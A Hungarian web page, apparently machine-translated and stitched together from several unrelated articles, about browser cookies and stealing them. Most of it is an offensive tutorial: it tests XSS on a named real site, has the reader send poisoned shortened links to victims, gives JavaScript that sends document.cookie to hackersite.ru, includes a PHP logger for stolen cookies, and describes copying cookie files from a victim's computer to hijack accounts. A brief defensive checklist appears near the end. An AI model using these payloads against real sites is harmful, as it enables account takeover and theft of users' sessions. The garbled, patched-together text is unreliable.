A barátom elfelejtette az egyik webhely jelszavát. Korábban azonban bejelölte az „Emlékezz rám” négyzetet a bejelentkezéskor. Google böngésző Chrome, amely lehetővé tette számára, hogy bejelentkezzen a webhelyre a fiókja alatt. Megkérdezték tőlem, hogy ez a mágikus állapot átvihető-e egy másik számítógépre. Helyesebb lenne persze megváltoztatni vagy visszaállítani a jelszót, de ezt az üggyel nem összefüggő okok miatt nem tudta megtenni az ismerős.
Hogyan használjuk az intercepter-ng-t bábokhoz
A modern szoftverek sokfélesége ellenére nehéz olyan programokat találni az Android számára, amelyek jobbak, mint az intercepter ng. Az első kritérium, amely a termék mellett szól, a tényleges teljesítmény. A legtöbb javasolt szippantó a hálózaton csak utánzat, amely nem látja el a deklarált funkciókat.
A következő pozitív tényező az alkalmazás sokoldalúsága és a felhasználók széles körének lefedettsége.
Számítógépes segítség 939-29-71
Kezdjük sorban. A cookie-k vagy „cookie-k” nagyon kis szövegfájlok – információkat tartalmazó könyvjelzők.
A webszerver elküldi ezeket az információkat a felhasználó böngészőjének. ahol ezeket az információkat a szükségességig tárolják. Nem egészen világos. Jól. RENDBEN.
Megpróbálom még könnyebbé tenni. Lát. bármelyik oldalon regisztráltál.
A regisztrációkor ezek a „sütik” jönnek létre.
Itt vannak.
Cookie Cadger
A program figyeli a WiFi hálózat forgalmát, elfogja a cookie-kat, és megismétli a felhasználó munkamenetét a böngészőben, megismételve a kéréseket a hitelesítő adataival. Matthew Sullivan szerző szeptember 30-án a derbyconi hackerkonferencián tartott előadást a programról. Közvetlenül a beszéd alatt Matthew Sullivan lehallgatta a konferencia egyik résztvevőjének nem biztosított, a Google-lal folytatott beszélgetését WiFi-n keresztül.
Hogyan lopjunk sütiket
Ha a webhely oldalon tartózkodva belép a címsor Firefox böngésző vagy Opera a következő szöveget: javascript:document.write(document.cookie); valami ilyesmit fog látni: remixAdminsBar=0; remixGroupType=0; remixpass=********************; remixfal=0; remixInformation=0; remixMembersBar=0; remix leírása=0; remixautobookmark=8; remixemail=*******; remixmid=23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideók=0; remixRecentNews=0; remixAlbumsBar=0 Figyelem! .
A webhelyek közötti szkriptelés teljes útmutatója
Az XSS egyfajta sebezhetőség szoftver, a webalkalmazásokban natív, amely lehetővé teszi a támadók számára, hogy kliensoldali szkriptet fecskendezzenek be a többi felhasználó által megtekintett weboldalakba. A Wikipédia XSS-hez a következő definícióval rendelkezik: „A webhelyek közötti szkriptezés (XSS) a webalkalmazásokban natív szoftversérülékenység egyik típusa (by a biztonsági korlátozások megkerülése böngésző)", amely lehetővé teszi a támadó számára, hogy kliensoldali szkriptet fecskendezzen be más felhasználók által megtekintett weboldalakra.
A cookie-k és a munkamenetek közötti különbség
Nem is olyan régen írtam egy cikket arról, hogyan kell regisztrálni és engedélyezni a felhasználókat az oldalon.
". Ebben a cikkben a munkamenetek és a cookie-k közötti különbséget fogom lebontani. hogy meghozza végső döntését.
Cookie-k. Nem, ez nem a cookie-król szól, hanem az Ön biztonságáról. Tehát valaki más számítógépén felkeresi kedvenc "vkontakte" webhelyét (vagy például leveleket néz meg), elutasítja a "jelszó mentése" opciót, boldogan átnézi a leveleket, és távozik. És ne gondolj arra a tényre, hogy a neved alatt most a címre léphetsz közösségi háló vagy postán.
Nem is gondolok egy olyan program helyzetére, amely megjegyzi a jelszót anélkül, hogy tudná. Ez már szándékos feltörés, és valószínűleg gyanítja, hogy ilyesmi megtörténhet, és nem fog ilyen számítógépen felkeresni kedvenc webhelyét. De beszélhetünk egyszerű emberi kíváncsiságról - barátokat látogattunk meg, aztán egyszer, és lehetőséget kapnak arra, hogy elolvassák a leveleit. Biztos vagy benne, hogy elutasítanak egy ilyen lehetőséget? Nem félsz, hogy közbejön valami? Mindenesetre félreteszem az erkölcsi kérdéseket, és csak arról beszélek, hogyan tárolódnak a számítógépen azok az információk, amelyeket most jelszókérés nélkül beengedhetnek valamelyik oldalra.
hogyan kell sütiket lopni
És ennek a technológiának a neve cookie-k.
És itt kezdődött minden. A http protokoll, amelyen valójában webhelyeket böngész (beleértve ezt is), kezdetben nem jelentette a kapcsolat fenntartásának lehetőségét. Ez azt jelenti, hogy durván fogalmazva kérést küld az oldalnak, választ kap, ez megjelenik a képernyőn, majd a szerver nem emlékszik semmire Önről. Persze ez akkor jó, ha az oldal pusztán információs és nem emlékezhet rólad semmire, de a Web 2.0 korát éljük írja be őket az adatbázis adataiba, de ez nem elég.
Nézzünk egy nagyon egyszerű példát. Fórum. Tehát regisztráltál, és a fórumon van egy bejegyzés, hogy van ilyen-olyan felhasználó ilyen-olyan jelszóval és még néhány további adattal. De most felkeresi a fórumot, és bejelentkezik - írja be a jelszavát. Valahol lennie kell olyan információnak, hogy be vagy jelentkezve. A szerveren? Természetesen nem! Lehetetlen elmenteni a szerverre arról, hogy az engedélyezés az Ön számítógépéről történt - nem fogja tudni megkülönböztetni Önt valaki mástól (még az Ön IP-címe sem azonosítja egyedileg)! Így az engedélyezés megtörténtére vonatkozó információkat a számítógépén kell tárolni. Erre valók a sütik, erre készültek.
A cookie egy kis rekord az Ön számítógépén, amely információkat tárol a meglátogatott webhelyről. Engedélyezéskor létrejön egy hasonló bejegyzés, amely után már körbejárhatod a fórumot, és az felismer. Ez azonban már automatikusan megtörténik - a cookie-ban tárolt információknak köszönhetően -, így ha úgy tesz, mintha Ön lenne a fórum fő adminisztrátora, az továbbra sem működik a jelszó-ellenőrzés megkerülésével.
Most visszatérhetünk oda, ahol ez a cikk kezdődött. Ha bejelentkezett valahova anélkül, hogy elmentette volna a jelszavát, akkor előfordulhat, hogy olyan bejegyzés jött létre a számítógépen, amely lehetővé teszi, hogy engedély nélkül adja meg ezt az erőforrást a neve alatt. Egy ilyen bejegyzés maga egy idő után elavulttá válik, de kényszerítheti a törlését. Minden böngésző másképp csinálja ezt, a kedvencemben megmutatom, hogyan kell csinálni Google Chrome. A lehetőségek megnyitása
Lépjen a "Speciális" fülre, és keresse meg a "sütik megjelenítése" gombot
Most természetesen törölheti az összes cookie-t, de ez felzaklathatja a számítógép tulajdonosát. Ezért például a felső mezőbe beírhatja az Önt érdeklő oldal nevét
Ekkor csak az oldalhoz kapcsolódó cookie-k törölhetők. Kipróbálhatod az enyémet. Sőt, ha bejelentkezik a fórumomba, majd törli a cookie-kat, akkor az engedélyezési információk elfelejtődnek. Próbáld ki!
a megjegyzéseket működteti
1. Mi az XSS
Az XSS típusú biztonsági rés tetszőleges JavaScript-kód beszúrását teszi lehetővé az oldal törzsébe. XSS támadás abban különbözik a többitől (pl. SQL injekció vagy PHP injekció), hogy nem a szerverre, hanem a kliensre hat.
hogyan kell sütiket lopni
Segítségével nem lehet adatbázistáblákat megtekinteni, shellt feltölteni stb. Az XSS leggyakoribb használata a cookie-k ellopása.
Cookie-k (Cookie-k) - egy webszerver által létrehozott kis adat, amelyet a felhasználó számítógépén fájlként tárolnak. Általában a cookie-kat fiókok tárolására használják, és leggyakrabban kódolt jelszót, bejelentkezési nevet és munkamenet-azonosítót tartalmaznak. (Bár nem mindig)
Az XSS két típusa van, aktív és passzív.
Passzív XSS megköveteli az áldozattól a közvetlen részvételt, például kövesse a JavaScript kódot tartalmazó linket. Az ilyen típusú XSS használatakor nem nélkülözheti az SI-t (Social Engineering)
Aktív XSS nem igényel semmilyen részvételt az áldozattól, csak fel kell lépnie az oldalra az XSS-sel. Aktív XSS lehet például fórumbejegyzésekben, chatekben, hírek hozzáadásakor stb.
2. Keresés az XSS-ben
Ebben a bekezdésben elmondom, hogyan találja meg az xss-t
2.1 Passzív XSS
A passzív XSS megtalálásához csak helyettesítse be a beviteli űrlapot ha a szkript működött, és megjelent az "xss" üzenet, akkor a sérülékenység fennáll, ha a szkript nem működött, akkor is próbálkozhat ">, valószínűleg ez a leggyakoribb xss biztonsági rés. Ha sem az egyik, sem a másik szkript nem működött, akkor valószínűleg nincs sebezhetőség.
Nézzünk egy példát.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
Látod a "keresés" űrlapot? tedd be oda ">és kattintson a "Keresés" gombra
Egy xss-t tartalmazó ablak kirepült, ami azt jelenti, hogy xss van jelen. (Talán, amikor ezt a cikket olvastad, ez az xss már javítva lesz.)
2.2 Aktív XSS
Ilyen CSS lehet például a profilmezőkben, amikor hírt ad hozzá a hír nevében és magában a hírben (ritkábban), a fórumok / chat / vendégkönyvek üzeneteiben, ahol a html engedélyezve van. Itt minden egyszerű, a mezőkbe beírjuk az előző albekezdésből származó szkriptet, és ha az üzenet megjelenik a képernyőn, akkor a sérülékenység jelen van.
Vegye figyelembe az xss-t a BB címkékben a fórumokon.
Megpróbálhatsz hülyén beszúrni javascript kódot a címkébe, így:
javascript:alert('xss')
Néhány címkének vannak paraméterei, például a címkének dynsrc és lowsrc paraméterei vannak, próbáljuk meg a kódot így helyettesíteni:
http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')
Ha a szkript működött, az xss az
3. XSS használata cookie-k ellopásához
Most a legfinomabb
A cookie-k ellopásához szükségünk van egy websnifferre, telepíthetsz valamilyen szippantót a tárhelyedre, vagy használhatsz online szippantót, amely most megtelt.
A passzív XSS-en keresztüli cookie-k ellopásához az áldozatnak mérgező linket kell követnie. A cookie-k ellopásához ehelyett használjuk másik szkript:
helyettesítjük a forgatókönyvet a linkben, és hagyjuk, hogy az áldozat kövesse azt, nézze meg a szippantónaplót és örüljön.
Nézzünk egy példát.
Vegyük azt az XSS-t a rambler-en az előző bekezdésből.
Paszta
">
a keresési űrlapon kattintson a "Keresés" gombra, nézze meg a címsort, és nézze meg:
http://miss.rambler.ru/srch/?sort=0& … &words =">
Ezt a linket odadobjuk az áldozatnak, és élvezzük a sütiket.
Egy ilyen hivatkozást látva az áldozat gyanakodhat valamire, ezért célszerű kódolni
">
URL-ben Vagy használjon olyan szolgáltatásokat, mint a http://tinyurl.com/
Térjünk át az aktív XSS-re, itt minden egyszerű, az alert() helyett img = new Image(); img.src = "sniffer image address"+document.cookie;
Most sütiket kaptunk. De mit kezdjünk velük? Egyszerű, a sajátjuk helyett ezeket kell helyettesíteni. NÁL NÉL Opera böngésző van beépített sütiszerkesztő (tools-> advanced-> cookie management), van egy plugin a firefoxhoz (nem emlékszem a nevére, használd a google-t)
Egyelőre ennyi, talán kiegészül a cikk
Arra a kérdésre, hogy hogyan szerezzünk COOKIES cookie-kat. Sütire van szüksége, hogyan kell megszerezni, kérem, mondja meg!!! 1 a szerző által beállított Vlad eeeeeeeeeeeeeee a legjobb válasz az Mik azok a sütik?
A tény az, hogy a www-technológiák fejlesztése és a programozási nyelvek internetes bevezetése során egy nagyon komoly probléma merült fel a programok fejlesztői előtt - hogyan lehet menteni az algoritmus végrehajtásának eredményeit minden egyes felhasználó számára. hosszú ideje? A HTTP protokoll önmagában nem képes a szoftverfolyamatok eredményeinek rögzítésére. A szekciók használata szintén nem jelent megoldást a problémára, mivel a kiszolgálóval való kapcsolat megszakadása után azonnal leáll a művelet.
A problémát a cookie-k (vagyis az angol fordításban "cookie") bevezetésével sikerült megoldani. A cookie-knak van egy figyelemre méltó tulajdonságuk - a felhasználó merevlemezén tárolódnak, és szinte korlátlan ideig tárolhatók.
Lényegében a cookie-k egyszerű szöveges fájlok, amelyeket a böngésző által használt speciális könyvtárban tárolnak (általában ideiglenes internetes fájlok néven), és ebbe a könyvtárba lépve megtekintheti őket ( gyors hozzáférés hozzá az IE böngészőhöz az Eszközök -> Internetbeállítások -> Ideiglenes internetes fájlok -> Beállítások -> Nézet menüponton keresztül hajtható végre.
Egyes cookie-k csak egy munkamenetre tárolhatók, a böngésző bezárása után törlődnek. Mások, meghatározott időre beállítva, egy fájlba íródnak. Általában ezt a fájlt "cookies.txt"-nek hívják (de több is lehet), és a számítógépre telepített böngésző munkakönyvtárában található.
más szavakkal
A cookie egy kis szöveges információ, amelyet a szerver küld a böngészőnek. A cookie-k önmagukban nem tudnak mit tenni, de amikor a felhasználó belép a szerverre (beírja a címét a böngésző sorába), a szerver ki tudja olvasni a sütikben található információkat, és annak elemzése alapján bármilyen műveletet végrehajtani. Például abban az esetben, ha valamihez a weben keresztül jogosult hozzáférni, a bejelentkezési név és a jelszó a munkamenet során cookie-kba kerül tárolásra, ami lehetővé teszi, hogy a felhasználó ne adja meg újra azokat az egyes jelszóval védett dokumentumok kérésekor.
Ha ezen a témakörön keresztül próbál hozzáférni valaki más jelszóval védett fiókjaihoz, akkor távolról (trójai) vagy szemtelenül flash meghajtóra másolással meg kell találnia a módját, ha hozzáfér ahhoz a számítógéphez, ahol az áldozat dolgozik, másolja ki ezt a cookie.txt fájlt, és cserélje ki (ugyanabban a böngészőjében). Ezután megy a kívánt webhelyre, ahol a fiók érdekli, és automatikusan hozzáférést kap. Ne feledje azonban, hogy ha az áldozat a munka végén megnyomja a fiókból (például a levélből) a kilépést, akkor a munkamenet információi törlődnek a cookie-kból, és Ön nem fog hozzáférni.
A Mozilla Firefox cookie-kat tárol a felhasználói profilban, a C:Documents and Settings fájlbanUsernameApplication DataMozillaFirefoxProfiles<имя профиля>cookies.txt
Az nternet explorer ezeket a sütiket külön szöveges fájlként menti a C:Documents and SettingsUsernameCookies mappába
Az Opera a cookie-kat a C:Documents and Settings UsernameApplication DataOperaOperaprofilecookies4.dat fájlban tárolja
Cookie-k - a weboldal által a felhasználó számítógépén tárolt információ szöveges fájl formájában. Hitelesítési adatokat tartalmaz (bejelentkezési név/jelszó, azonosító, telefonszám, cím postafiók), felhasználói beállítások, hozzáférési állapot. A böngésző profiljában tárolva.
Cookie hack a látogató munkamenetének ellopása (vagy „eltérítése”) egy webes erőforráshoz. A titkos információ nemcsak a feladó és a címzett számára válik elérhetővé, hanem egy harmadik fél – a lehallgató személy – számára is.
Cookie-hackelési eszközök és technikák
A számítógéptolvajoknak, akárcsak a való életben dolgozó kollégáik, a készségek, ügyesség és tudás mellett természetesen saját eszközeik is vannak - a mesterkulcsok és szondák egyfajta arzenálja. Ismerkedjünk meg a hackerek legnépszerűbb trükkjeivel, melyekkel sütiket halásznak ki az internet lakóitól.
Szimatolók
Különleges programok a hálózati forgalom figyelésére és elemzésére. Nevük az angol "sniff" (sniff) igéből származik, mert. szó szerint "kiszimatolja" a csomópontok között továbbított csomagokat.
A támadók azonban szippantót használnak a munkamenetadatok, üzenetek és egyebek lehallgatására bizalmas információ. Támadásaik tárgyát többnyire nem biztonságos hálózatok jelentik, ahol a cookie-k nyílt HTTP-munkamenetben kerülnek elküldésre, vagyis gyakorlatilag nincsenek titkosítva. (A nyilvános Wi-Fi a legsebezhetőbb.)
A következő módszereket használják a szippantás beszúrására a felhasználó gazdagépe és a webszerver közötti internetes csatornába:
- hálózati interfészek (hubok, kapcsolók) „hallgatása”;
- forgalom elágazása és másolása;
- kapcsolat a hálózati csatorna megszakadásával;
- elemzés speciális támadásokon keresztül, amelyek átirányítják az áldozat forgalmat egy szippantóhoz (MAC-spoofing, IP-spoofing).
Az XSS rövidítés a Cross Site Scripting rövidítése. Weboldalak támadására használják felhasználói adatok ellopása érdekében.
Az XSS működése a következő:
- a támadó rosszindulatú kódot (speciális álcázott szkriptet) fecskendez be egy webhely, fórum weboldalára vagy üzenetbe (például, amikor egy közösségi hálózaton cseveg);
- az áldozat felkeresi a fertőzött oldalt és aktiválja állítsa be a kódot számítógépén (kattint, követ egy hivatkozást stb.);
- viszont az aktivált rosszindulatú kód „kivonja” a felhasználó bizalmas adatait a böngészőből (különösen a cookie-kat), és elküldi azokat a támadó webszerverére.
Egy szoftveres XSS-mechanizmus „beültetése” érdekében a hackerek a webszerverek, online szolgáltatások és böngészők mindenféle sebezhetőségét használják fel.
Az összes XSS sebezhetőség két típusra osztható:
- Passzív. A támadás egy adott weboldal szkriptjének lekérdezésével érhető el. Rosszindulatú kód különféle formában beírható egy weboldalon (például egy webhely keresősávjába). A passzív XSS-re a leginkább érzékenyek azok az erőforrások, amelyek nem szűrik a HTML-címkéket az adatok beérkezésekor;
- Aktív. Közvetlenül a szerveren található. És aktiválódnak az áldozat böngészőjében. A csalók aktívan használják őket különféle blogokban, chatekben és hírfolyamokban.
A hackerek gondosan "álcázzák" XSS-szkripteiket, hogy az áldozat ne gyanítson semmit. Megváltoztatják a fájl kiterjesztését, képként adják át a kódot, motiválják őket a hivatkozás követésére, érdekes tartalommal vonzzák őket. Ennek eredményeként: egy PC-felhasználó, aki nem birkózott meg saját kíváncsiságával, saját kezével (egérkattintással) session cookie-kat küld (bejelentkezési névvel és jelszóval!) Az XSS-szkript szerzőjének - egy számítógépes gazembernek.
Cookie-hamisítás
Minden süti tárolása és elküldése a webszervernek (ahonnan "érkeztek") változtatás nélkül – eredeti formájában – azonos értékekkel, karakterláncokkal és egyéb adatokkal történik. Paramétereik szándékos módosítását cookie-spoofingnak nevezik. Más szóval, amikor egy sütit hamisítanak, a támadó vágyálom. Például egy webáruházban történő fizetéskor a fizetés összege a cookie-ban kisebb oldalra módosul – így „megtakarítás” keletkezik a vásárlásokon.
A közösségi hálózaton valaki más fiókjából ellopott munkamenet-cookie-k „beszúródnak” egy másik munkamenetbe és egy másik számítógépre. Az ellopott süti tulajdonosa megkapja teljes hozzáférés az áldozat fiókjába (levelezés, tartalom, oldalbeállítások) mindaddig, amíg az oldalán van.
A cookie-k "szerkesztése" a következőkkel történik:
- "Cookie-k kezelése..." funkciók az Opera böngészőben;
- kiegészítők Cookies Manager és Advanced Cookie Manager for FireFox;
- IECookiesView segédprogramok (csak Internet Explorerhez);
- szöveg szerkesztő mint az AkelPad, a Jegyzettömb vagy a Windows jegyzettömb.
Fizikai hozzáférés az adatokhoz
Magasan egyszerű áramkör megvalósítása több lépésből áll. De ez csak akkor hatékony, ha az áldozat számítógépe nyílt ülésszak, például a Vkontakte, felügyelet nélkül marad (és elég sokáig!):
- Lépjen be a böngésző címsorába javascript függvény, amely megjeleníti az összes mentett cookie-t.
- Az "ENTER" megnyomása után mindegyik megjelenik az oldalon.
- A sütiket a rendszer másolja, fájlba menti, majd flash meghajtóra továbbítja.
- Egy másik számítógépen a sütiket új munkamenetben cserélik le.
- Megnyílik az áldozat számlájához való hozzáférés.
Általános szabály, hogy a hackerek a fenti eszközöket (+ egyebeket) kombinálva (mivel a védelmi szint sok webes erőforráson meglehetősen magas), és külön-külön is (ha a felhasználók túlságosan naivak) használják.
XSS + szippantó
- Létrejön egy XSS-szkript, amely megadja az online szippantó címét (saját gyártású vagy egy adott szolgáltatás).
- A rosszindulatú kód .img kiterjesztéssel (képformátum) kerül mentésre.
- Ezután ez a fájl feltöltődik a webhely oldalára, csevegésre vagy személyes üzenetre - ahol a támadást végrehajtják.
- A felhasználó figyelmét felhívja a létrehozott „csapda” (itt a social engineering jön szóba).
- Ha a „csapda” működik, az áldozat böngészőjéből származó cookie-kat a szippantó elfogja.
- A keksz kinyitja a szippantó naplókat, és kiszedi az ellopott sütiket.
- Ezután a fenti eszközökkel helyettesítést hajt végre, hogy megszerezze a fióktulajdonos jogait.
A cookie-k védelme a hackelés ellen
- Használjon titkosított kapcsolatot (megfelelő protokollok és biztonsági módszerek használatával).
- Ne válaszoljon kétes linkekre, képekre, csábító ajánlatokra, hogy megismerkedjen az "új ingyenes szoftverrel". Főleg idegenektől.
- Csak megbízható webes forrásokat használjon.
- A "Kijelentkezés" gomb megnyomásával fejezze be az engedélyezett munkamenetet (és ne csak zárja be a lapot!). Főleg, ha nem volt bejelentkezve a fiókba személyi számítógép, hanem például egy internetkávézóban lévő PC-ről.
- Ne használja böngészője „Jelszó mentése” funkcióját. A tárolt regisztrációs adatok időnként növelik a lopás kockázatát. Ne legyen lusta, ne szánjon néhány percet a jelszó megadására és a bejelentkezésre minden munkamenet elején.
- A webes böngészés után – közösségi hálózatok, fórumok, csevegések, webhelyek meglátogatása – törölje a mentett sütiket és ürítse ki a böngésző gyorsítótárát.
- Rendszeresen frissítse a böngészőket és a víruskereső szoftvereket.
- Használjon olyan böngészőbővítményeket, amelyek védelmet nyújtanak az XSS-támadások ellen (például NoScript for FF és Google Chrome).
- Időnként a számlákban.
És ami a legfontosabb - ne veszítse el az éberséget és a figyelmet, miközben pihen vagy dolgozik az interneten!
Mi az a süti?
Létezik egy mechanizmus, amely lehetővé teszi a http-kiszolgáló számára, hogy néhányat a felhasználó számítógépén tároljon szöveges információk majd lépjen kapcsolatba vele. Ez az információ sütinek hívják. Valójában minden cookie egy pár: a paraméter neve és értéke. Minden cookie-hoz hozzá van rendelve a domain, amelyhez tartozik. Biztonsági okokból minden böngészőben a http szerver csak a saját domain cookie-jához férhet hozzá. Ezen túlmenően a cookie-knak lejárati dátuma is lehet, amely esetben a számítógépen addig a dátumig tárolódnak, még akkor is, ha minden böngészőablak be van zárva.
Miért fontosak a sütik?
Minden többfelhasználós rendszerben sütiket használnak a felhasználó azonosítására. Illetve a felhasználó aktuális kapcsolata a szolgáltatással, a felhasználói munkamenet. Ha valaki felismeri a sütiket, bejelentkezhet az Ön nevében. Mert be Ebben a pillanatban nagyon kevés internetes forrás ellenőrzi az IP-cím változását egy felhasználói munkamenet során.
Hogyan lehet módosítani vagy módosítani a cookie-kat?
A böngészőfejlesztők nem biztosítanak beépített eszközöket a cookie-k szerkesztéséhez. De meg lehet boldogulni egy rendes jegyzettömbbel (jegyzettömbbel).
1. lépés: hozzon létre szöveges fájl szöveggel
ablakok Rendszerleíróadatbázis-szerkesztő 5.00 verzió
@="C:\\IE_ext.htm"
Elmentjük IE_ext.reg néven
2. lépés: A létrehozott fájl segítségével módosítsa a Windows rendszerleíró adatbázisát.
3. lépés: hozzon létre egy szöveges fájlt szöveggel
<
script
language="javascript">
external.menuArguments.clipboardData.setData("Szöveg" , external.menuArguments.document.cookie);
external.menuArguments.document.cookie= "tesztnév=tesztérték; elérési út=/; domain=tesztdomain.ru";
alert(external.menuArguments.document.cookie);
script >
Mentse el C:\IE_ext.htm néven
4. lépés: Megyünk a számunkra érdekes webhelyre.
5. lépés: Jobb klikk rákattint az egérrel szabad hely oldalt, és válassza ki a menüpontot "Munka a sütikkel". Hozzáférés engedélyezése a vágólaphoz. Az ehhez a webhelyhez tartozó cookie-k a vágólapra kerülnek. Beillesztheti a jegyzettömbjüket (jegyzettömb), és megnézheti.
6. lépés: Egy cookie módosításához szerkessze a C:\IE_ext.htm fájlt, cserélje ki tesztnév a süti nevében, tesztérték- jelentéséről, tesztdomain.com- a webhely domainjére. Ha szükséges, adjon hozzá további ilyen sorokat. Az irányítás kényelme érdekében a módosítás előtt és után hozzáadtam az aktuális cookie-k kimenetét a szkripthez: alert(external.menuArguments.document.cookie);
7. lépés: Futtassa újra az 5. lépést, majd frissítse az oldalt.
A lényeg: frissített sütikkel fogunk menni ehhez az internetes forráshoz.
Hogyan lehet sütiket ellopni JavaScript segítségével?
Ha a támadónak sikerült lehetőséget találnia egy tetszőleges JavaScript-szkript futtatására az áldozat számítógépén, akkor olvassa el aktuális sütik nagyon könnyen tudja. Példa:
varstr=document.cookie;
De vajon képes lesz-e átvinni ezeket a webhelyére, mert amint arra korábban utaltam, egy JavaScript szkript nem képes további megerősítés hozzáfér egy másik domainben található webhelyhez? Kiderült, hogy egy JavaScript-szkript bármilyen http-kiszolgálón található képet betölthet. Ezzel egyidejűleg vigye át a letöltési kérelemben szereplő szöveges információkat erre a képre. Példa: http://hackersite.ru/xss.jpg?text_info Tehát ha ezt a kódot futtatod:
varimg= Új kép();
img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(document.cookie);
akkor a süti a „kép” letöltésére és a támadónak való „hagyásra” vonatkozó kérésben lesz.
Hogyan kell kezelni az ilyen „kép” feltöltési kéréseket?
A támadónak csak tárhelyet kell találnia php támogatásés ehhez hasonló helykód:
$uid=urldecode($_SZERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>
Ezután a szkripthez tartozó összes lekérdezési paraméter a fájlba kerül log.txt. Csak a korábban leírt JavaScript-szkriptben marad a csere http://hackersite.ru/xss.jpg a php szkript elérési útjára.
Eredmény
Csak az XSS sebezhetőségeinek kihasználásának legegyszerűbb módját mutattam be. De ez azt bizonyítja, hogy legalább egy ilyen sebezhetőség jelenléte egy többfelhasználós internetes webhelyen lehetővé teheti a támadó számára, hogy az erőforrásait az Ön nevében használja.
Az Opera nyissa meg a főmenüt, lépjen a "Beállítások" szakaszba, és válassza ki a " sort Általános beállítások...". És csak melegen nyomhatod CTRL billentyűk+ F12. Ezzel megnyílik a böngésző beállítási ablaka, ahol a "Speciális" lapon a bal oldali ablaktáblában a "Cookie-k" szakaszra kell kattintania. Ebben rá kell kattintania a "Cookie-k kezelése" gombra.
NÁL NÉL Mozilla Firefox nyissa meg az "Eszközök" részt a menüben, és válassza a "Beállítások" elemet. A beállítások ablakban lépjen az "Adatvédelem" fülre, keresse meg ott a "Show Cookies..." gombot, és kattintson rá a böngésző által tárolt cookie-k listájának eléréséhez. Itt lehet őket keresni és megtekinteni.
Az Internet Explorerben bontsa ki az "Eszközök" részt a menüben, és válassza a "Tulajdonságok" lehetőséget. A tulajdonság beállításai ablakban lépjen az Általános lapra, és kattintson a Beállítások gombra a Böngészési előzmények részben. Ily módon megnyílik egy másik ablak („Ideiglenes fájlok beállításai”), amelyben a „Fájlok megjelenítése” gombra kell kattintania.
A megnyíló Internet Explorer ideiglenes fájlok mappájának tartalomjegyzékében kattintson a "Név" címszóra - így az összes cookie-t egy blokkba csoportosíthatja, egy közös heterogén fájlok halomba. Itt megtalálhatja a kívánt fájlt, és megnyithatja egy szabványos Jegyzettömbben megtekintés vagy szerkesztés céljából.
A Google Chrome böngészőben kattintson az ablak jobb felső sarkában található csavarkulcs ikonra, és válassza a menü Opciók menüpontját. A böngésző megnyitja a "Beállítások" oldalt, és a bal oldali ablaktáblájában kattintson a "Speciális" hivatkozásra, a speciális beállítások oldalon pedig a "Tartalombeállítások" gombra. Még nem az utolsó oldal a böngésző által tárolt cookie-k felé vezető úton.
Kattintson a következő oldalon az "Összes cookie és webhelyadat" gombra, és végre hozzáférhet a cookie-k listájához.
A Google Chrome lehetővé teszi a cookie-k keresését, megtekintését és törlését.
A Safari böngészőben kattintson a fogaskerék ikonra a jobb oldalon felső sarokés válassza ki a "Beállítások ..." sort. A beállítások módosítására szolgáló ablakban a "Biztonság" fülre kell lépnie, hogy ott kattintson a "Cookie-k megjelenítése" gombra. A Safari csak a cookie-k kereséséhez és törléséhez biztosít funkciókat, ezen ideiglenes fájlok tartalma itt csak részben látható.